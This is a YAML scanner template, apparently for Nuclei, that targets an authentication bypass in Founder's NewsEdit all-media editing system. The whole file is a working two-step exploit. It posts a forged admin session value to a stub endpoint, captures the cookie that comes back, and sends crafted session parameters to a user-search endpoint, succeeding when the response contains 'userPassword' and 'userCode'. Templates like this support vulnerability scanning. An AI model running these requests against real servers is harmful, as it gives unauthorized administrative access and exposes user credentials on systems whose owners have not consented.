flow: |
    http(1) && http(2)
http:
    - extractors:
        - group: 1
          internal: true
          name: session_cookie
          part: header
          regex:
            - 'Set-Cookie: ([^;]+);'
          type: regex
      id: get-cookie
      raw:
        - |
          POST /newsedit/api/stub/getRemotePapers.do?siteCode=1 HTTP/1.1
          Host: {{Hostname}}
          Content-Type: application/x-www-form-urlencoded

          Session_SysUser=1%2C127.0.0.1%2C1%2C1%2C1%2Cadmin%2Csysadmin%2Clocalhost
    - id: auth-bypass
      matchers:
        - condition: and
          part: body
          type: word
          words:
            - userPassword
            - userCode
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          POST /newsedit/newsedit/userSearch/getUser.do HTTP/1.1
          Host: {{Hostname}}
          Content-Type: application/x-www-form-urlencoded
          Cookie: {{session_cookie}}

          UUID=adminUser&Session_ProcParam=a=1,a=0,a=1,a=1,a=-9999,a=sysadmin,a=0,a=admin,a=2024-06-11%2011:11:11:000,a=1,a=1&DocIDs=1&DocLibID=1
id: FZMediaEditor-auth-bypass
info:
    author: onewin
    description: |
        NewsEdit系统存在身份验证绕过漏洞，通过构造特定会话可获取管理员敏感信息
        [漏洞发现时间：2024年6月]
    name: 方正全媒体采编系统权限绕过
    severity: high
    tags:
        - FOUNDER-全媒体采编系统
